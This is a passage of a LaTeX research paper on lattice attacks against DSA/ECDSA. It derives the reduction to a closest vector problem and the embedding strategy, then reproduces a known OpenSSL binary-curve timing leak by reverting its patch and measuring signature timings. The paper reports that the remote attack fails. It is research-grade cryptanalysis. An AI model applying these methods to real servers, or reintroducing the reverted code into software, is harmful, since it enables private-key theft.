minimal. Let $x'$ denote the orthogonal projection of $x$ on $U + v$. Recursively, find $y \in L'$ near $x' - v$. Let $w = y + v$.\\ 559 | In order to find $v$ and $x'$, we proceed as follows: 560 | \begin{itemize} 561 | \item Write $x$ as a linear combination of the orthogonal basis: $\displaystyle x = \sum^{d}_{i=1} \gamma_i b_i^{\ast}$. 562 | \item Let $\delta$ be the integer nearest to $\gamma_d$. 563 | \item Then $\displaystyle x' = \sum^{d-1}_{i=1} \gamma b_i^{\ast} + \delta b_d^{\ast}$ and $v = \delta b_d$. 564 | \end{itemize} 565 | 566 | The \textbf{Rounding Off procedure} is simple enough to be explained here: 567 | 568 | \begin{figure}[H] 569 | \centering 570 | \begin{tikzpicture}[scale=1] 571 | 572 | 573 | \begin{scope}[scale=.28,local bounding box=scope1] 574 | \coordinate (Origin) at (0,0); 575 | \coordinate (XAxisMin) at (-1,0); 576 | \coordinate (XAxisMax) at (10,0); 577 | \coordinate (YAxisMin) at (0,-1); 578 | \coordinate (YAxisMax) at (0,10); 579 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 580 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 581 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 582 | 583 | % basis vectors 584 | \draw [->] (Origin) -- (4,1); 585 | \draw [->] (Origin) -- (1,3); 586 | 587 | % explanation 588 | \node[right] at (-7, 9) {\small{non-lattice vector}}; 589 | \draw[->, black!50] (-3, 8) -- (6,6.25); 590 | 591 | \node[right] at (-7, 4) {\small{basis vectors}}; 592 | \draw[->, black!50] (-5, 3) -- (-1, 2); 593 | 594 | % our little node 595 | \node[shape=circle,fill=purple,scale=0.4] at (6.7,6.25){}; 596 | \node[shape=circle,draw=purple,fill=none,scale=0.8] at (6.7,6.25){}; 597 | 598 | 599 | \end{scope} 600 | 601 | \begin{scope}[scale=.28,shift={(13,0)}] 602 | \coordinate (Origin) at (0,0); 603 | \coordinate (XAxisMin) at (-1,0); 604 | \coordinate (XAxisMax) at (10,0); 605 | \coordinate (YAxisMin) at (0,-1); 606 | \coordinate (YAxisMax) at (0,10); 607 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 608 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 609 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 610 | 611 | % basis vectors 612 | \draw [->] (Origin) -- (4,1); 613 | \draw [->] (Origin) -- (1,3); 614 | 615 | % extended basis vectors 616 | \draw [black!40] (4,1) -- (5,1.25); 617 | \draw [black!40] (1,3) -- (1.6,5); 618 | 619 | \draw [black!40] (5.1,1.25) -- (6.7,6.25); 620 | \draw [black!40] (1.6,5) -- (6.7,6.25); 621 | 622 | %\draw [black!40] (4,1) -- (5,4); 623 | %\draw [black!40] (1,3) -- (5,4); 624 | 625 | % our little node 626 | \node[shape=circle,fill=purple,scale=0.4] at (6.7,6.25){}; 627 | 628 | \end{scope} 629 | 630 | 631 | \begin{scope}[scale=.28,shift={(26,0)}] 632 | \coordinate (Origin) at (0,0); 633 | \coordinate (XAxisMin) at (-1,0); 634 | \coordinate (XAxisMax) at (10,0); 635 | \coordinate (YAxisMin) at (0,-1); 636 | \coordinate (YAxisMax) at (0,10); 637 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 638 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 639 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 640 | 641 | % basis vectors 642 | \draw (Origin) -- (4,1); 643 | \draw (Origin) -- (1,3); 644 | 645 | % extended basis vectors 646 | \draw [black!40] (4,1) -- (5,4); 647 | \draw [black!40] (1,3) -- (5,4); 648 | 649 | % our little node 650 | \node[shape=circle,fill=purple!60,scale=0.4] at (6.7,6.25){}; 651 | 652 | % our new little node :) 653 | \node[shape=circle,fill=purple,scale=0.4] at (5,4){}; 654 | \node[shape=circle,fill=none,draw=purple,scale=0.8] at (5,4){}; 655 | 656 | \end{scope} 657 | 658 | \end{tikzpicture} 659 | \caption{The non-lattice vector can be written with the basis vectors of the lattice, then the procedure rounds off these coefficients to find the closest lattice vector} 660 | \end{figure} 661 | 662 | \section{Lattice Attacks on DSA} 663 | 664 | Lattices and the tools they come with have been used everywhere in crypto: building security proofs, building cryptosystems (and sometimes post quantum cryptosystems), breaking cryptosystems. 665 | 666 | In 1982, the first efficient lattice basis reduction algorithm LLL was invented by the Lenstra brothers and Lovász\cite{lll}. More than 10 years later, in 1995, Coppersmith was publishing his theorem along with a construction using LLL that could be used to attack RSA\cite{coppersmith}. 667 | 668 | A year later, In 1996, D. Boneh and R. Venkatesan\cite{boneh-venkatesan} formulated the \textbf{Hidden Number Problem} and used that same algorithm to construct a proof on Diffie-Hellman and other related algorithms, which is thought by many cryptographers as one of the most positive applications of lattices. 669 | 670 | The same kind of idea was independently found by \textbf{Howgrave-Graham} and \textbf{Smart} three years later\cite{HG-smart}, but this time used to attack DSA. Oddly, they made use of Babai's algorithm while a more efficient technique called the Embedding Strategy was used in the paper by Boneh and Venkatesan. 671 | 672 | Following is an explanation of a special case of Howgrave-Graham and Smart's attack on DSA, that we will later use to attack ECDSA. We will then explain how to improve on it by using the Embedding Technique. 673 | 674 | \subsection{Reducing a Relaxed DSA Problem to a Closest Vector Problem} 675 | 676 | So now imagine that \textbf{we have a number $n$ of signatures} $(r,s)$ from DSA that \textbf{all have particularly ``small'' nonces} $k_i$.\\ 677 | Recall these are the equations we now have, for $i \in \mathbb{Z}_n$: 678 | \begin{align*} 679 | &r_i = (g^{k_i} \pmod{p}) \pmod{q}\\ 680 | &s_i = k_i^{-1} ( H(m_i) + x \cdot r_i ) \pmod{q} 681 | \end{align*} 682 | 683 | Where $g$, $p$, $q$ are public and $H(m_i)$ can be computed as well. Here, the $k_i$ are the secret nonces, $x$ is the private key. 684 | 685 | We notice that we know another way of writing \textbf{the second equation} since we know $H(m_i)$: 686 | 687 | $$ H(m_i) = s_i k_i - x \cdot r_i \pmod{q} $$ 688 | 689 | As this is an attack on the nonces we want to \textbf{get rid of the private key}. To do that we will notice that we can use one of the equations and remove it from the others, let's say we can use the first equation: 690 | 691 | \begin{align*} 692 | &H(m_0) = s_0 \cdot k_0 - x \cdot r_0 \pmod{q}\\ 693 | \forall i, \text{ } &H(m_0) \cdot r_0^{-1} \cdot r_i = s_0 \cdot k_0 \cdot r_0^{-1} \cdot r_i - x \cdot r_i \pmod{q} 694 | \end{align*} 695 | 696 | Since we know all the $r_i$ we can compute the second equation, and we can then use it to remove the private key $x$ from all the other equations: 697 | 698 | \begin{align*} 699 | \forall i \neq 0 \text{, } H(m_i) - H(m_0) \cdot r_0^{-1} \cdot r_i &= s_i \cdot k_i - s_0 \cdot k_0 \cdot r_0^{-1} \cdot r_i \pmod{q}\\ 700 | (H(m_i) - H(m_0) \cdot r_0^{-1} \cdot r_i) \cdot s_i^{-1} &= k_i - k_0 \cdot s_0 \cdot r_0^{-1} \cdot r_i \cdot s_i^{-1} \pmod{q} 701 | \end{align*} 702 | 703 | We know have $n - 1$ equations with \textbf{only two unknowns}: the nonces $k_i$ and the nonce of the first equation $k_0$, which should all be around the same size which is relatively \textbf{small}. 704 | 705 | $$ k_i + A_i k_0 + B_i = 0 \pmod{q} $$ 706 | 707 | We have now successfully \textbf{avoided to attack the discrete logarithm} part of the system and reduced it to finding small solutions to a set of modular equations. This is where lattices are useful. We know have to shape our equations to reduce our problem to a CVP or SVP and use any of the algorithm previously talked about. 708 | 709 | We now have a system with $k_i < q \text{ } \forall i \in \mathbb{Z}_n$ 710 | $$ \begin{cases} 711 | k_0\\ 712 | k_1 = - A_1 k_0 + z_1 q - B_1 \\ 713 | \hdots\\ 714 | k_{n-1} = - A_{n-1} k_0 + z_{n-1} q - B_{n-1}\\ 715 | \end{cases} 716 | $$ 717 | 718 | And if the $k_i$ are small we know that the distance between the $-A_i k_0 + z_i q$ and $Bi$ are small. How can we transform that in a lattice problem? More accurately in a Closest Vector Problem? First let's \textbf{transform the above system into a matrix system}: 719 | 720 | $$ 721 | \begin{pmatrix} k_0\\k_1\\ \vdots\\k_{n-1} \end{pmatrix} 722 | = 723 | \begin{pmatrix} 724 | -1\\ 725 | A_1 & q \\ 726 | \vdots & & \ddots \\ 727 | A_{n-1} & & & q 728 | \end{pmatrix} 729 | \begin{pmatrix} -k_0\\z_1\\ \vdots\\z_{n-1} \end{pmatrix} 730 | - 731 | \begin{pmatrix} 0\\B_1\\ \vdots\\B_{n-1} \end{pmatrix} 732 | $$ 733 | 734 | It is now clear that we can use the $n \times n$ matrix as a lattice in which we are looking for a vector (which is the integer linear combinations done with the coefficient vector $(-k_0, z_1, \hdots, z_{n-1})$) that should be very close to the vector $(0, B_1 , \hdots, B_{n-1})$ since their distance is the small vector $(k_0, \hdots, k_{n-1})$. 735 | 736 | In other words, we need to find a vector from the lattice spanned by the columns of the above $n \times n$ matrix that is closed to our non-lattice vector $(0, B_1 , \hdots, B_{n-1})$. This will allow us to compute the coefficient vector $(-k_0, z_1, \hdots, z_{n-1})$ which then would allow us to compute the nonces vector $(k_0, \hdots, k_{n-1})$. \textbf{This is an instance of the Closest Vector Problem}, we can then use one of Babai's procedure to try to solve it. Since these algorithms only promise approximations, these ways of finding the nonces are heuristics and not proven. Different lattices will give different outcomes, but as it is known, LLL often yields better results than expected. 737 | 738 | \subsection{The Embedding Strategy} 739 | 740 | While Howgrave-Graham and Smart talk about using the Babai procedure to solve the CVP, our tests show that it is not efficient enough. The well-known ``Embedding Strategy'' allows to heuristically reduce the CVP problem to the SVP problem and thus directly make use of a lattice basis reduction algorithm to solve the problem (like LLL). 741 | 742 | This is how it works: we add our non-lattice vector $u$ in the basis, so that it is now part of the lattice. Remember, we are looking for a very close lattice vector $v$ to our non-lattice vector $u$, since both these vectors are in the lattice, we hope that our reduction algorithm will find $u - v$ or $v - u$ which is in our lattice and should be really small, the heuristic also says to increase the lattice's dimension and to only give a coefficient of the new dimension to our new basis vector $u$. This way we can test if our solution has used our vector $u$ by checking if the smallest vector of our reduced basis has that (negative) value as extra dimension. 743 | 744 | Our previous problem is now reduced to find a small basis vector in the lattice spanned by the columns of the matrix: 745 | 746 | $$ 747 | \begin{pmatrix} 748 | -1 & & & & B_0\\ 749 | A_1 & q & & & B_1 \\ 750 | \vdots & & \ddots & &\vdots \\ 751 | A_{n-1} & & & q & B_{n-1}\\ 752 | 0 & 0 & \hdots & 0 & 1 753 | \end{pmatrix} 754 | $$ 755 | 756 | Here the new dimension's coefficient, that we will call the trick, is $1$. To balance its value with the other values of the wanted solution, we will use $q / 2^{l+1}$ instead of $1$ where $l$ is the number of Most Significant Bits known to be zero in the nonces. 757 | 758 | 759 | \section{A Timing Attack in OpenSSL} 760 | 761 | \subsection{Side-Channel Attacks} 762 | 763 | We have seen that using a non-cryptographically secure Pseudo Random Number Generator (PRNG) or making mistakes implementing the generation of the nonce break DSA and ECDSA. But more subtle than that, we now know that the slightest information on the nonces of a few signatures will allow us to break the same secure system. 764 | 765 | Side-Channel attacks are a particular range of attacks that use information acquired through non-obvious channels of use. For example by measuring the electromagnetic radiations, the power consumed, the vibrations, the acoustic or even the time taken by an algorithm to perform an operation. These measurements often provides critical information about the private elements of cryptosystems. 766 | 767 | In this paper we will focus on timing attacks, which are one of the only viable Side Channels Attacks to perform on a remote target. It was first introduced by Kocher in 1996\cite{Kocher}, who showed how to break Diffie-Hellamn, RSA and DSA with the time the algorithms took to perform the operations involving the secret elements of their system. 768 | 769 | \subsection{The Timing Attack} 770 | 771 | \textbf{B.B.Brumley} and \textbf{N.Tuveri} found out\cite{brumley-tuveri} that a part of OpenSSL's ECDSA code contained a timing attack: 772 | 773 | In ECDSA, to counter timing attacks one of the state-of-the-art techniques is to use a \textbf{Constant-Time} algorithm. For binary curves, in OpenSSL, the \textbf{Montgomery Ladder} algorithm is used during the point multiplication of $r = [k] P$. Unfortunately, an optimization was present right before the algorithm. 774 | 775 | \begin{figure}[H] 776 | \begin{minted}[breaklines,frame=single]{C} 777 | /* find top most bit and go one past it */ 778 | i = bn_get_top(scalar) - 1; 779 | mask = BN_TBIT; 780 | word = bn_get_words(scalar)[i]; 781 | while (!(word & mask)) 782 | mask >>= 1; 783 | mask >>= 1; 784 | /* if top most bit was at word break, go to next word */ 785 | if (!mask) { 786 | i--; 787 | mask = BN_TBIT; 788 | } 789 | 790 | for (; i >= 0; i--) { 791 | word = bn_get_words(scalar)[i]; 792 | while (mask) { 793 | BN_consttime_swap(word & mask, x1, x2, bn_get_top(group->field)); 794 | BN_consttime_swap(word & mask, z1, z2, bn_get_top(group->field)); 795 | if (!gf2m_Madd(group, point->X, x2, z2, x1, z1, ctx)) 796 | goto err; 797 | if (!gf2m_Mdouble(group, x1, z1, ctx)) 798 | goto err; 799 | BN_consttime_swap(word & mask, x1, x2, bn_get_top(group->field)); 800 | BN_consttime_swap(word & mask, z1, z2, bn_get_top(group->field)); 801 | mask >>= 1; 802 | } 803 | mask = BN_TBIT; 804 | } 805 | \end{minted} 806 | \caption{The optimization that leads to a timing vulnerability in \textit{crypto/ec/ec2\_mult.c} in the old version of OpenSSL} 807 | \end{figure} 808 | 809 | This made the computation of the signature appear faster when the binary size of the nonce $k$ was shorter, and slower when it was longer. The time OpenSSL took to compute an ECDSA signature was leaking the length of the nonces! 810 | 811 | \subsection{A TLS Handshake with an Ephemeral Cipher-Suite} 812 | 813 | \begin{figure}[H] 814 | \includegraphics[width=\textwidth]{rfc5246.png} 815 | \caption{The handshake illustrated in \href{https://tools.ietf.org/html/rfc5246#section-7.3}{RFC 5246} along with the extra-messages due to the ephemeral cipher-suite chosen} 816 | \end{figure} 817 | 818 | To attack the Server's ECDSA private key, we need it to sign a multitude of messages with that key. The easiest way to do this is to ask for an ephemeral connection. In Figure 5, you can see that when asking for an ephemeral cipher-suite in the ClientHello (DHE/ECDHE) you then get one extra message in the server's response: the \textbf{ServerKeyExchange} packet. 819 | 820 | \begin{figure}[H] 821 | \includegraphics[width=\textwidth]{serverKeyExchange.png} 822 | \caption{The serverKeyExchange packet parsed by WireShark} 823 | \end{figure} 824 | 825 | As you can see the server answers with a DSA/ECDSA signature, which is computed over a truncated hash of the ClientHello.random concatenated with ServerHello.random concatenated with the serverKeyExchange.params which are all available in clear during the handshake. And by the way, the fact that only the parameters and not the algorithm used in the Key Exchange are signed, is the cause of a long and old series of attack that had its more recent episode with the \textbf{Logjam attack}\cite{logjam}. 826 | 827 | \begin{figure}[H] 828 | \includegraphics[width=\textwidth]{ecdsa_rfc4492.png} 829 | \caption{The excerpt of \href{https://tools.ietf.org/html/rfc4492#section-5.4}{RFC 4492} talking about the signature part of an ephemeral handshake} 830 | \end{figure} 831 | 832 | The attack will consist of sending several ServerHello messages and collecting the signatures while timing the response time until enough small nonces are captured. 833 | 834 | \subsection{Measuring a Timing Attack} 835 | 836 | Since we are doing a remote attack, we cannot time the exact computation of the signature, what we time instead is the \textbf{round trip} time, defined by Crosby et al\cite{crosby} as such: 837 | $$ \text{response\_time } = \text{ processing\_time } + \text{ propagation\_time } + \text{ jitter} $$ 838 | 839 | Here the \textit{processing\_time} is the difference between the target emitting its response and the target reading our helloClient. The nonce multiplication operation we want to time is in there and should be the only relevant computation in the overall timing of that part (i.e. all other server procedures' time are negligible compared to that multiplication operation). The \textit{propagation\_time} is the average time spent by the data in transit (i.e. between the attacker and the target). Finally, the \textit{jitter} is the uncontrollable noise/latency that can happen for many diverse reasons. The jitter is often the core problem of a remote timing attack.\\ 840 | 841 | To measure the timing of something, with extreme precision, we will rely on the \textbf{rdtscp} assembly instruction that returns the number of cycles the CPU has performed since boot. Contrary to rdtsc this operation does not need cpuid to be precise since rdtscp flushes the pipeline intrinsically. You only "need" to use cpuid and rdtsc if your processor does not support the more recent rdtscp, both requires a Pentium CPU. 842 | 843 | \subsection{The Setup} 844 | 845 | We modified \href{ftp://ftp.openssl.org/source/old/1.0.1/openssl-1.0.1j.tar.gz}{openssl-1.0.1j} to re-introduce the vulnerability by reverting the \href{https://git.openssl.org/?p=openssl.git;a=blobdiff;f=CHANGES;h=1633d27975c91f122c4e9266b2c3cf4e56e8ffbf;hp=22749650b701d91cc43af24a226369116c2a46f8;hb=992bdde62d2eea57bb85935a0c1a0ef0ca59b3da;hpb=bbcf3a9b300bc8109bb306a53f6f3445ba02e8e9}{patch from B.B.Brumley and N.Tuveri in OpenSSL 1.0.1j} as can be seen in figure \ref{fig:commented_patch}. 846 | 847 | \begin{figure}[H] 848 | \begin{minted}[breaklines,frame=single]{C} 849 | /* 850 | * We do not want timing information to leak the length of k, so we 851 | * compute G*k using an equivalent scalar of fixed bit-length. 852 | */ 853 | 854 | /* 855 | if (!BN_add(k, k, order)) 856 | goto err; 857 | if (BN_num_bits(k) <= BN_num_bits(order)) 858 | if (!BN_add(k, k, order)) 859 | goto err; 860 | */ 861 | \end{minted} 862 | \caption{the patch commented in \textit{crypto/ecdsa/ecs\_ossl.c}} 863 | \label{fig:commented_patch} 864 | \end{figure} 865 | Instead of creating a client packet that only allows for our ephemeral ECDSA handshake, we can use a server that only accepts that kind of ciphersuite. This is done with the OpenSSL command line tool and the following arguments: 866 | 867 | \begin{minted}[breaklines, 868 | ]{bash} 869 | $ openssl s_server -cert server.pem -key server.key -cipher "ECDHE-ECDSA-AES128-SHA256" -serverpref -quiet 870 | \end{minted} 871 | 872 | The \textit{-serverpref} argument allows us to force the server's ciphersuite on the client. Here we also use relevant server private and public keys that we generated with the following commands. Note that we chose the binary curve \textbf{sect163r2} but any binary curve should work (since they would use the same vulnerable code): 873 | 874 | \begin{minted}[breaklines]{bash} 875 | $ openssl ecparam -out server.key -name sect163r2 -genkey 876 | $ openssl req -new -key server.key -x509 -nodes -days 365 -out server.pem 877 | \end{minted} 878 | 879 | And we obtain the certificate of figure 880 | \ref{fig:cert}. 881 | 882 | \begin{figure}[H] 883 | \begin{minted}[breaklines,frame=single]{bash} 884 | $ openssl x509 -in server.pem -noout -text 885 | Certificate: 886 | Data: 887 | Version: 3 (0x2) 888 | Serial Number: 10869927066769118182 (0x96d9bd136d2d53e6) 889 | Signature Algorithm: ecdsa-with-SHA256 890 | Issuer: C=US, ST=example@example.com, L=example@example.com, O=example@example.com, OU=example@example.com, CN=example@example.com/ emailAddress=example@example.com 891 | Validity 892 | Not Before: May 5 21:01:16 2015 GMT 893 | Not After : May 4 21:01:16 2016 GMT 894 | Subject: C=US, ST=example@example.com, L=example@example.com, O=example@example.com, OU=example@example.com, CN=example@example.com/ emailAddress=example@example.com 895 | Subject Public Key Info: 896 | Public Key Algorithm: id-ecPublicKey 897 | Public-Key: (163 bit) 898 | pub: 899 | 04:04:f3:e6:dd:ff:c4:ba:45:28:2f:3f:ab:e0:e8: a2:20:b9:89:80:38:7a:05:d6:78:6b:3f:bd:8e:a7: 9c:b7:99:1c:d7:79:85:15:bb:cc:47:ce:54 900 | ASN1 OID: sect163r2 901 | NIST CURVE: B-163 902 | X509v3 extensions: 903 | X509v3 Subject Key Identifier: 904 | 35:B6:17:DC:06:42:19:C5:23:13: 905 | 0E:35:26:AF:81:0C:E2:C4:91:B6 906 | X509v3 Authority Key Identifier: 907 | keyid:35:B6:17:DC:06:42:19:C5: 908 | 23:13:0E:35:26:AF:81:0C:E2:C4:91:B6 909 | 910 | X509v3 Basic Constraints: 911 | CA:TRUE 912 | Signature Algorithm: ecdsa-with-SHA256 913 | 30:2e:02:15:03:f6:6a:a4:d4:e2:e5:80:30:bc:65:5a:da:32: 914 | 5e:ab:b7:8b:fd:f6:88:02:15:01:fa:fa:23:59:f7:c1:23:d5: 915 | 75:7c:a6:49:0b:d3:56:85:95:34:82:02 916 | \end{minted} 917 | \caption{The x509 certificate containing the binary curve as ECDHE/ECDSA parameters we generated with OpenSSL} 918 | \label{fig:cert} 919 | \end{figure} 920 | 921 | \subsection{From the Server (the Target)} 922 | 923 | We first modified OpenSSL to store the nonces it signed and how long it took to sign them. We then queried that server many times to make it use the ECDSA nonce multiplication operation. It took us 6 to 7 seconds to fetch 1,000 signatures and around a minute to fetch 10,000 signatures from the server. 924 | 925 | \begin{figure}[H] 926 | \includegraphics[width=\textwidth]{serverside_scrambled.png} 927 | \caption{Every point is a signature, plotted according to the time it took the server to compute it in clock cycles (x axis)} 928 | \end{figure} 929 | 930 | After obtaining all the nonces and the timings, we plotted them and displayed the result in figure \ref{fig:serverside} to see that there was indeed a timing vulnerability in the ECDSA signature of OpenSSL for binary curves. 931 | 932 | \begin{figure}[H] 933 | \includegraphics[width=\textwidth]{serverside.png} 934 | \caption{The same graph where the signatures have been sorted by the binary length of the nonce (y axis) along the time it took the server to compute them in clock cycles (x axis)} 935 | \label{fig:serverside} 936 | \end{figure} 937 | 938 | The frequency plot in figure \ref{fig:frequency_server} might be a better indication that the obvious strategy here is to cherry-pick the fastest responses and hope that they reach a pre-defined number of most significant bits set to zero. 939 | 940 | \begin{figure}[H] 941 | \includegraphics[width=\textwidth]{frequency_server.png} 942 | \caption{The blue line represents the signatures generated with nonces of bitsize longer than 157 bits, the red line represents signatures correlated with nonces of bitsize inferior or equal to 157 bits.} 943 | \label{fig:frequency_server} 944 | \end{figure} 945 | 946 | Finally we did some statistics on the amount of short nonces, the statistics were approximately the same for 1,000 and for 10,000 signatures: 947 | 948 | \begin{figure}[H] 949 | \begin{center} 950 | \begin{tabular}{@{} *2c @{}} 951 | \toprule 952 | Length & Percentage \\ 953 | \midrule 954 | $<157$& 0 \\ 955 | 157& 1 \\ 956 | 158& 3 \\ 957 | 159& 6 \\ 958 | 160& 13 \\ 959 | 161& 24 \\ 960 | 162& 50 961 | \bottomrule 962 | \end{tabular} 963 | \end{center} 964 | \caption{Statistics on nonces generated for 1,000 signatures} 965 | \end{figure} 966 | These percentages are rounded and that shows that short nonces are pretty rare, here's a better table showing the amount of short nonces for 10,000 signatures requested: 967 | 968 | \begin{figure}[H] 969 | \begin{center} 970 | \begin{tabular}{@{} *2c @{}} 971 | \toprule 972 | length & amount \\ 973 | \midrule 974 | 146 & 1 \\ 975 | 150& 1 \\ 976 | 151 & 4 \\ 977 | 152 & 8 \\ 978 | 153 & 12 \\ 979 | 154 & 12 \\ 980 | 155 & 41 \\ 981 | 156& 90 \\ 982 | 157 & 141 \\ 983 | 158 & 319 \\ 984 | 159 & 624 \\ 985 | 160 & 1259 \\ 986 | 161 & 2503 \\ 987 | 162 &4985 988 | \bottomrule 989 | \end{tabular} 990 | \end{center} 991 | \caption{Statistics on nonces generated for 10,000 signatures} 992 | \end{figure} 993 | 994 | We will discuss in the following sections how many nonces we need to perform the lattice attack. 995 | 996 | 997 | \subsection{From a Remote Machine} 998 | 999 | We tried getting the same kind of results from a different server located in the same local network. The tests were performed on a Intel Pentium CPU 1403 @ 2.60GHz. To simplify testing and avoid parsing the responses, we modified the OpenSSL server to store the truncated hashes and the signatures server side. 1000 | 1001 | The source code of the client is in Appendix A, it always sends the same \textit{HelloClient} packet (and the same \textit{client.Random}). The client counts the CPU cycles of the response time. If the attack is performed from multiple machines with different CPU frequencies then we would have to convert the CPU cycles into a time unit before gathering the data together. 1002 | 1003 | Several ways of increasing the accuracy of these measurements were researched. The easiest thing is to configure the client machine that is in our control. Decreasing the jitter is often impossible since it happens out of our reach, getting close to the server seems to be the best way to do it, although our results are still inconclusive in a local network test environment as you will see later. 1004 | 1005 | The program is run with the \textit{taskset} tool to avoid using multiple CPU, along with some kernel options like \textit{isolcpus} to avoid interruptions on the CPU we are using to make the measurements. The frequency scaling on that same CPU is disabled to avoid inconsistently counting CPU cycles. The program sends all but one byte, then sends the last byte and starts the \textit{rdtscp} counter. The counter is stopped as soon as the first byte is received. To do this we also need to disable \textit{Nagel's algorithm} on the socket we are using to disable network optimizations. 1006 | 1007 | After collecting all the signatures we get rid of the 10 first samples and their imprecision due to the server cache warming up. 1008 | 1009 | \begin{figure}[H] 1010 | \includegraphics[width=\textwidth]{fail.png} 1011 | \caption{the y axis represents the bitsize of the nonces, the x axis the time the OpenSSL server took to respond. They are obviously not correlated} 1012 | \end{figure} 1013 | 1014 | Retrieving 500 tuples (signatures and truncated digests) that took the smallest amount of time from 100,000 signatures, we can see that we do not have enough nonces of small sizes in our set (see next section on the lattice attack for numbers), plus the amount of false-positive is extremely high. We then try to get the smallest time upper-bound that would contain enough small nonces. We arrive at approximately 5,000: the fastest 5,000 signatures of our 100,000 signatures set should contain enough small nonces to do our lattice attack. And as we can see in figure 15 and in the following statistics, the amount of false positive is still extremely high. 1015 | 1016 | \begin{table}[H] 1017 | \parbox{.45\linewidth}{ 1018 | \centering 1019 | \begin{tabular}{@{} *3c @{}} 1020 | \toprule 1021 | length&amount&percentage\\ 1022 | \midrule 1023 | 150 & 1 & 0\\ 1024 | 152 & 1 & 0\\ 1025 | 153 & 1 & 0\\ 1026 | 154 & 3 & 0\\ 1027 | 155 & 10 & 2\\ 1028 | 156 & 11 & 2\\ 1029 | 157 & 18 & 3\\ 1030 | 158 & 27 & 5\\ 1031 | 159 & 42 & 8\\ 1032 | 160 & 89 & 17\\ 1033 | 161 & 113 & 22\\ 1034 | 162 & 184 & 36\\ 1035 | \bottomrule 1036 | \end{tabular} 1037 | \caption{Stats on the nonces that computed the fastest 500 signatures from 100,000 handshakes} 1038 | } 1039 | \hfill 1040 | \parbox{.45\linewidth}{ 1041 | \centering 1042 | \begin{tabular}{@{} *3c @{}} 1043 | \toprule 1044 | length&amount&percentage\\ 1045 | \midrule 1046 | 150 & 1 & 0\\ 1047 | 151 & 1 & 0\\ 1048 | 152 & 3 & 0\\ 1049 | 153 & 14 & 0\\ 1050 | 154 & 14 & 0\\ 1051 | 155 & 41 & 0\\ 1052 | 156 & 69 & 1\\ 1053 | 157 & 134 & 2\\ 1054 | 158 & 212& 4\\ 1055 | 159 & 388 & 7\\ 1056 | 160 & 721 & 14\\ 1057 | 161 & 1252 & 25\\ 1058 | 162 & 2150 & 43\\ 1059 | \bottomrule 1060 | \end{tabular} 1061 | \caption{Stats on the nonces that computed the fastest 5,000 signatures from 100,000 handshakes} 1062 | } 1063 | \end{table} 1064 | 1065 | To eliminate the false positives, the idea here is to select a random subset of let's say 42 tuples (if we are aiming for nonces smaller than 156 bits) and do a lattice attack, if we do not find anything build another random subset of the same size. Rinse and repeat. This leads to more than $1.36 \times 10^{104}$ different combinations, which is impossible and this is because our timing measurements are not precise enough. With better measurements this attack would indeed be devastating.\\ 1066 | 1067 | From there, we can imagine many other ways to get better results. \textbf{Hardware time stamping} is done with special Network Interface Controllers (NIC), and allows us to get our TCP packets time stamped to a nanosecond precision. Such an attack \href{https://vimeo.com/112575034}{was demonstrated last year by Paul McMillan} on an embedded device. It is a recent technology, mostly due to a need by the Precision Time Protocol (PTP) for extra timing precision to synchronize clocks throughout a computer network. This approach was not researched by this paper but might lead to more precision in the attack.\\ 1068 | The two other obvious solutions would be to get as close as possible to the target (which we are already doing) and to collect more samples. After collecting 10 million signatures (the collection lasted more than 19 hours) we do indeed get better results, although still not exploitable as seen in the following tables and in figure \ref{fig:frequency_client}. Note that every experiment we did gave very different results and the numbers displayed in this paper should not give any indication on general statistics. 1069 | 1070 | \begin{table}[H] 1071 | \parbox{.45\linewidth}{ 1072 | \centering 1073 | \begin{tabular}{@{} *3c @{}} 1074 | \toprule 1075 | length&amount&percentage\\ 1076 | \midrule 1077 | 150 & 1 & 2\\ 1078 | 153 & 2 & 4\\ 1079 | 154 & 1 & 2\\ 1080 | 155 & 1 & 2\\ 1081 | 156 & 3 & 6\\ 1082 | 157 & 4 & 8\\ 1083 | 158 & 5 & 10\\ 1084 | 159 & 5 & 10\\ 1085 | 160 & 11 & 22\\ 1086 | 161 & 6 & 12\\ 1087 | 162 & 11 & 22\\ 1088 | \bottomrule 1089 | \end{tabular} 1090 | \caption{Stats on the nonces that computed the fastest 50 signatures from 10 million handshakes} 1091 | } 1092 | \hfill 1093 | \parbox{.45\linewidth}{ 1094 | \centering 1095 | \begin{tabular}{@{} *3c @{}} 1096 | \toprule 1097 | length&amount&percentage\\ 1098 | \midrule 1099 | 149 & 1 & 1\\ 1100 | 150 & 1 & 1\\ 1101 | 152 & 3 & 3\\ 1102 | 153 & 8 & 8\\ 1103 | 154 & 1 & 1\\ 1104 | 155 & 3 & 3\\ 1105 | 156 & 5 & 5\\ 1106 | 157 & 6 & 6\\ 1107 | 158 & 10& 10\\ 1108 | 159 & 9 & 9\\ 1109 | 160 & 22 & 22\\ 1110 | 161 & 11 & 11\\ 1111 | 162 & 20 & 20\ 1112 | \bottomrule 1113 | \end{tabular} 1114 | \caption{Stats on the nonces that computed the fastest 100 signatures from 10 million handshake} 1115 | } 1116 | \end{table} 1117 | 1118 | \begin{figure}[H] 1119 | \includegraphics[width=\textwidth]{frequency_client.png} 1120 | \caption{The blue line represents the signatures generated with nonces of bitsize longer than 157 bits, the red line represents signatures correlated with nonces of bitsize inferior or equal to 157 bits.} 1121 | \label{fig:frequency_client} 1122 | \end{figure} 1123 | 1124 | \subsection{The Lattice Attack} 1125 | 1126 | Obviously our attack is not going to work from a remote machine because our timings are not correlated with the length of the nonces. We can try a theoretic attack by selecting the nonces by hand. 1127 | 1128 | The code for the lattice attack can be found in Appendix B, it uses \textbf{Sage} and the embedding strategy talked about earlier. 1129 | 1130 | In our experiments, we cannot solve for nonces greater than 157 bits (6 bits known). LLL also often provides worse results than \textbf{BKZ}. BKZ is another algorithm that approximate a solution for the SVP, it uses LLL but ends up with a smaller basis most of the time. 1131 | 1132 | When only 6 bits are known, BKZ needs a minimum of 50 tuples (signatures and truncated hashes) to find the 